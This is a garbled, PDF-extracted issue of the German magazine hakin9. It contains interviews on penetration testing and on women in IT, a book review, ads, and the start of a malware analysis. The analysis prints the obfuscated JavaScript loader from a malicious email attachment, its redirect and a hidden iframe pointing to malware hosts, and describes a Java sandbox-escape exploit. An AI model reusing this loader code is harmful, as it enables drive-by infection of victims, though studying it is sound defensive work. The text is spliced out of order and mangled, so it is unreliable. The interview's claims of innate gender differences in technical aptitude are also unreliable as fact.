onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
